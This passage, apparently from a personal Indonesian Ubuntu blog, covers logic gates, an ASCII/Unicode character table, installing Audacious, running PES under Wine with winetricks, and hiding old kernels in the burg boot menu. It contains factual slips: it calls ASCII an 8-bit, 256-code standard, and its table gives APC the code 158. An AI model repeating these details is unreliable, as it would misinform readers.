     Gerbang OR berbeda dengan gerbang NOT yang hanya memiliki satu input, gerbang ini memiliki paling sedikit 2 jalur input. Artinya inputnya bisa lebih dari dua, misalnya empat atau delapan. Yang jelas adalah semua gerbang logika selalu mempunyai hanya satu output. Gerbang OR akan memberikan sinyal keluaran tinggi jika salah satu atau semua sinyal masukan bernilai tinggi, sehingga dapat dikatakan bahwa gerbang OR hanya memiliki sinyal keluaran rendah jika semua sinyal masukan bernilai rendah.


GERBANG NAND
     Gerbang NANDadalah suatu NOT-AND, atau suatu fungsi AND yang dibalikkan. Dengan kata lain bahwa gerbang NAND akan menghasilkan sinyal keluaran rendah jika semua sinyal masukan bernilai tinggi.


GERBANG NOR
      Gerbang NOR adalah suatu NOT-OR, atau suatu fungsi OR yang dibalikkan sehingga dapat dikatakan bahwa gerbang NOR akan menghasilkan sinyal keluaran tinggi jika semua sinyal masukanya bernilai rendah.


GERBANG XOR
     Gerbang X-OR akan menghasilkan sinyal keluaran rendah jika semua sinyal masukan bernilai rendah atau semua masukan bernilai tinggi atau dengan kata lain bahwa X-OR akan menghasilkan sinyal keluaran rendah jika sinyal masukan bernilai sama semua.


GERBANG XNOR
              Gerbang X-NOR akan menghasilkan sinyal keluaran tinggi jika semua sinyal masukan bernilai sama (kebalikan dari gerbang X-OR).

Kode ASCII

Kode Standar Amerika untuk Pertukaran Informasi atau ASCII (American Standard Code for Information Interchange) merupakan suatu standar internasional dalam kode huruf dan simbol seperti Hex dan Unicode tetapi ASCII lebih bersifat universal, contohnya 124 adalah untuk karakter "|".

Ia selalu digunakan oleh komputer dan alat komunikasi lain untuk menunjukkan teks. Kode ASCII sebenarnya memiliki komposisi bilangan biner sebanyak 8 bit. Dimulai dari 00000000 hingga 11111111. Total kombinasi yang dihasilkan sebanyak 256, dimulai dari kode 0 hingga 255 dalam sistem bilangan Desimal.



Karakter Nilai Unicode
(heksadesimal)
Nilai ANSI ASCII
(desimal)
Keterangan
NUL 0000 0 Null (tidak tampak)
SOH 0001 1 Start of heading (tidak tampak)
STX 0002 2 Start of text (tidak tampak)
ETX 0003 3 End of text (tidak tampak)
EOT 0004 4 End of transmission (tidak tampak)
ENQ 0005 5 Enquiry (tidak tampak)
ACK 0006 6 Acknowledge (tidak tampak)
BEL 0007 7 Bell (tidak tampak)
BS 0008 8 Menghapus satu karakter di belakang kursor (Backspace)
HT 0009 9 Horizontal tabulation
LF 000A 10 Pergantian baris (Line feed)
VT 000B 11 Tabulasi vertikal
FF 000C 12 Pergantian baris (Form feed)
CR 000D 13 Pergantian baris (carriage return)
SO 000E 14 Shift out (tidak tampak)
SI 000F 15 Shift in (tidak tampak)
DLE 0010 16 Data link escape (tidak tampak)
DC1 0011 17 Device control 1 (tidak tampak)
DC2 0012 18 Device control 2 (tidak tampak)
DC3 0013 19 Device control 3 (tidak tampak)
DC4 0014 20 Device control 4 (tidak tampak)
NAK 0015 21 Negative acknowledge (tidak tampak)
SYN 0016 22 Synchronous idle (tidak tampak)
ETB 0017 23 End of transmission block (tidak tampak)
CAN 0018 24 Cancel (tidak tampak)
EM 0019 25 End of medium (tidak tampak)
SUB 001A 26 Substitute (tidak tampak)
ESC 001B 27 Escape (tidak tampak)
FS 001C 28 File separator
GS 001D 29 Group separator
RS 001E 30 Record separator
US 001F 31 Unit separator
SP 0020 32 Spasi
! 0021 33 Tanda seru (exclamation)
" 0022 34 Tanda kutip dua
# 0023 35 Tanda pagar (kres)
$ 0024 36 Tanda mata uang dolar
% 0025 37 Tanda persen
& 0026 38 Karakter ampersand (&)
0027 39 Karakter Apostrof
( 0028 40 Tanda kurung buka
) 0029 41 Tanda kurung tutup
* 002A 42 Karakter asterisk (bintang)
+ 002B 43 Tanda tambah (plus)
, 002C 44 Karakter koma
- 002D 45 Karakter hyphen (strip)
. 002E 46 Tanda titik
/ 002F 47 Garis miring (slash)
0 0030 48 Angka nol
1 0031 49 Angka satu
2 0032 50 Angka dua
3 0033 51 Angka tiga
4 0034 52 Angka empat
5 0035 53 Angka lima
6 0036 54 Angka enam
7 0037 55 Angka tujuh
8 0038 56 Angka delapan
9 0039 57 Angka sembilan
: 003A 58 Tanda titik dua
; 003B 59 Tanda titik koma
< 003C 60 Tanda lebih kecil
= 003D 61 Tanda sama dengan
> 003E 62 Tanda lebih besar
? 003F 63 Tanda tanya
@ 0040 64 A keong (@)
A 0041 65 Huruf latin A kapital
B 0042 66 Huruf latin B kapital
C 0043 67 Huruf latin C kapital
D 0044 68 Huruf latin D kapital
E 0045 69 Huruf latin E kapital
F 0046 70 Huruf latin F kapital
G 0047 71 Huruf latin G kapital
H 0048 72 Huruf latin H kapital
I 0049 73 Huruf latin I kapital
J 004A 74 Huruf latin J kapital
K 004B 75 Huruf latin K kapital
L 004C 76 Huruf latin L kapital
M 004D 77 Huruf latin M kapital
N 004E 78 Huruf latin N kapital
O 004F 79 Huruf latin O kapital
P 0050 80 Huruf latin P kapital
Q 0051 81 Huruf latin Q kapital
R 0052 82 Huruf latin R kapital
S 0053 83 Huruf latin S kapital
T 0054 84 Huruf latin T kapital
U 0055 85 Huruf latin U kapital
V 0056 86 Huruf latin V kapital
W 0057 87 Huruf latin W kapital
X 0058 88 Huruf latin X kapital
Y 0059 89 Huruf latin Y kapital
Z 005A 90 Huruf latin Z kapital
[ 005B 91 Kurung siku kiri
\ 005C 92 Garis miring terbalik (backslash)
] 005D 93 Kurung sikur kanan
^ 005E 94 Tanda pangkat
_ 005F 95 Garis bawah (underscore)
` 0060 96 Tanda petik satu
a 0061 97 Huruf latin a kecil
b 0062 98 Huruf latin b kecil
c 0063 99 Huruf latin c kecil
d 0064 100 Huruf latin d kecil
e 0065 101 Huruf latin e kecil
f 0066 102 Huruf latin f kecil f
g 0067 103 Huruf latin g kecil
h 0068 104 Huruf latin h kecil
i 0069 105 Huruf latin i kecil
j 006A 106 Huruf latin j kecil
k 006B 107 Huruf latin k kecil
l 006C 108 Huruf latin l kecil
m 006D 109 Huruf latin m kecil
n 006E 110 Huruf latin n kecil
o 006F 111 Huruf latin o kecil
p 0070 112 Huruf latin p kecil
q 0071 113 Huruf latin q kecil
r 0072 114 Huruf latin r kecil
s 0073 115 Huruf latin s kecil
t 0074 116 Huruf latin t kecil
u 0075 117 Huruf latin u kecil
v 0076 118 Huruf latin v kecil
w 0077 119 Huruf latin w kecil
x 0078 120 Huruf latin x kecil
y 0079 121 Huruf latin y kecil
z 007A 122 Huruf latin z kecil
{ 007B 123 Kurung kurawal buka
¦ 007C 124 Garis vertikal (pipa)
} 007D 125 Kurung kurawal tutup
~ 007E 126 Karakter gelombang (tilde)
DEL 007F 127 Delete

0080 128 Dicadangkan

0081 129 Dicadangkan

0082 130 Dicadangkan

0083 131 Dicadangkan
IND 0084 132 Index
NEL 0085 133 Next line
SSA 0086 134 Start of selected area
ESA 0087 135 End of selected area

0088 136 Character tabulation set

0089 137 Character tabulation with justification

008A 138 Line tabulation set
PLD 008B 139 Partial line down
PLU 008C 140 Partial line up

008D 141 Reverse line feed
SS2 008E 142 Single shift two
SS3 008F 143 Single shift three
DCS 0090 144 Device control string
PU1 0091 145 Private use one
PU2 0092 146 Private use two
STS 0093 147 Set transmit state
CCH 0094 148 Cancel character
MW 0095 149 Message waiting

0096 150 Start of guarded area

0097 151 End of guarded area

0098 152 Start of string

0099 153 Dicadangkan

009A 154 Single character introducer
CSI 009B 155 Control sequence introducer
ST 009C 156 String terminator
OSC 009D 157 Operating system command
PM 009E 158 Privacy message
APC 009F 158 Application program command

00A0 160 Spasi yang bukan pemisah kata
¡ 00A1 161 Tanda seru terbalik
¢ 00A2 162 Tanda sen (Cent)
£ 00A3 163 Tanda Poundsterling
¤ 00A4 164 Tanda mata uang (Currency)
¥ 00A5 165 Tanda Yen
¦ 00A6 166 Garis tegak putus-putus (broken bar)
§ 00A7 167 Section sign
¨ 00A8 168 Diaeresis
© 00A9 169 Tanda hak cipta (Copyright)
ª 00AA 170 Feminine ordinal indicator
« 00AB 171 Left-pointing double angle quotation mark
¬ 00AC 172 Not sign
­ 00AD 173 Tanda strip (hyphen)
® 00AE 174 Tanda merk terdaftar
¯ 00AF 175 Macron
° 00B0 176 Tanda derajat
± 00B1 177 Tanda kurang lebih (plus-minus)
² 00B2 178 Tanda kuadrat (pangkat dua)
³ 00B3 179 Tanda kubik (pangkat tiga)
´ 00B4 180 Acute accent
µ 00B5 181 Micro sign
00B6 182 Pilcrow sign
· 00B7 183 Middle dot

Winamp di Ubuntu (Audacious)

 
Audacious adalah sebuah perangkat lunak Pemutar Media berlisensi bebas yang berfokus dengan penggunaan sumber daya komputer yang rendah, kualitas suara yang tinggi dan mendukung berbagai jenis format. Aplikasi ini didesain untuk digunakan pada sistem operasi keluarga POSIX seperti Linux.

Cara menginstallnya adalah :
  • Buka Terminal
  • Ketik sudo add-apt-repository ppa:nilarimogard/webupd8

  • lalu sudo apt-get update

  • Kemudian sudo apt-get install audacious

  • Terakhir tunggu proses sampai selesai, jika sudah selesai buka dengan menekan tombol windows kemudian ketik audacious (Ubuntu 12.04)
Sekian. semoga bermanfaat :)

Install PES di Ubuntu


Selamat datang ubuntu mania,  kali ini saya aka berbagi ilmu kembali tentang bagaimana cara install pes di ubuntu.. Memang sedikit repot dan rempong  :D
Tapi buat para gamers bola khususnya yang menggunakan OS Ubuntu pastinya rela untuk melakukan hal tersebut demi bisa bermain game PES di ubuntu semua.. :D

Tidak usah banyak cakap lagi, sekarang mari kita langsung melakukan proses install game tersebut:
  • Pertama install paket wine yang berfungsi menjalankan aplikasi .exe nya windows
    sudo add-apt-repository ppa:ubuntu-wine/ppa
    sudo apt-get update
    sudo apt-get install wine
  • Masuk pada directory wine
    cd /home/user anda/.wine
  • Ketik winecfg
    Fungsinya untuk membuka pengaturan wine dan membuat otomatis folder instalasi wine untuk program windows. tetapi jangan di apa2kan. jika sudah terbuka langsung tutup kembali saja
  • Ketikkan wget http://www.kegel.com/wine/winetricks
  • Lanjut dengan mengetikkan sudo chmod +x ./winetricks

  • Sekarang kita perlu menginstall semua DLLs ato Libraries yang diperlukan, ketikkan
    ./winetricks d3dx9 droid winxp sound=alsa volnum vcrun2008 dotnet20 ie6 corefonts
    Ket : #d3dx9, akan menginstall directx 9, #droid, akan menginstall font droid dan #vcrun2008/dotnet20/ie6, akan menginstall Net.Framework nya si Windows

    Proses ini membutuhkan waktu yang lumayan lama, jadi mohon bersabar ya :D

  • Jika teman2 menggunakan VGA NVidia, gunakan perintah
    ./winetricks physx
  • Ketikkan, wine regedit
  • Buka HKey_Current_User->Software->Wine, kemudian buat key baru dan beri nama Direct3D, dan tambahkan string didalam key yang baru di buat tersebut
  • Setiap string isikan dengan value berikut
    “DirectDrawRenderer”="opengl”
    “Nonpower2Mode”="repack”
    “OffscreenRenderingMode”=”fbo”
    “RenderTargetLockMode”=”auto”
    “UseGLSL”=”readtex”
    “VertexShaderMode”=”hardware”
    “VideoDescription”=”ATI Radeon HD 4200 Graphics” (ini versi VGA saya, ubah ini jadi nama graphics nya teman2 sendiri)
    “VideoDriver”=”ati2dvag.dll”
    “VideoMemorySize”=”256″ (ubah ini menjadi sesuai dengan memori graphics sobat)


    Untuk graphics nya Nvidia, ganti VideoDriver jadi ”nv4_disp.dll”.
  • Selesai dan terakhir install PES dengan cara klik kanan pada pes.exe lalu pilih jalankan dengan wine :D
  • Lalu install seperti kalian semua menginstall pada windows
Sekian, Semoga Membantu :)

Hapus Old Kernel pada Boot Loader Ubuntu

Bagi pengguna Ubuntu yang pernah melakukan update pada grub loader mungkin pernah mengalami hal seperti yang saya alami sekarang. Yaitu ketika pc / laptop di restar kernel yang lama akan tercantum pada booting yang akan dipilih. hal itu membuat lebih banyak pilihan booting. memang hal tersebut tidak ada efeknya bagi agan2 semua. tapi menurut saya itu terlalu banyak2in pilihan booting kita. contohnya seperti ini
Sebelum
Dari situ kelihatan banyak sekali kernel lama yang masih ada pada ubuntu kita. padahal saya haya ingin menggunakan kernel versi 3.2.0-41 saja
Berikut merupakan cara mengatasinya :

  • Buka terminal
  • Masuk pada super user (sudo su), masukkan password
  • Lakukan edit data pada burg.cfg (disini saya menggunakan burg)
  • Ketik gedit /boot/burg/burg.cfg
  • Sebelum melakukan pengeditan liat dahulu kernel mana yang ingin anda hapus atau sembunyikan, saya ingin menghapus
·         Ubuntu GNU/Linux, with Linux 3.2.0-39-generic-pae
·        Ubuntu GNU/Linux, with Linux 3.2.0-39-generic-pae (recovery mode)
·         Ubuntu GNU/Linux, with Linux 3.2.0-23-generic-pae
·        Ubuntu GNU/Linux, with Linux 3.2.0-23-generic-pae (recovery mode)
  • Pada gedit cari tulisan atau kernel yang ingin di hapus tersebut dan tambahkan tanda # pada setiap tab dari kernel tersebut (Lihat pada kotak) 
  • Jika sudah simpan konfigurasi tersebut
  • Tutup semua program kemudian restart dan hasilnya kernel linux yang lama atau tidak diinginkan sudah tidak ada lagi
  •  Semoga membantu :)
 
Terima kasih disampaikan telah berkunjung ke halaman ini, Mari belajar bersama.... Sharing ilmu atau pun yang lain bersama agar bermanfaat bagi yang lain...:) MUHAMMAD NUR ROHMAN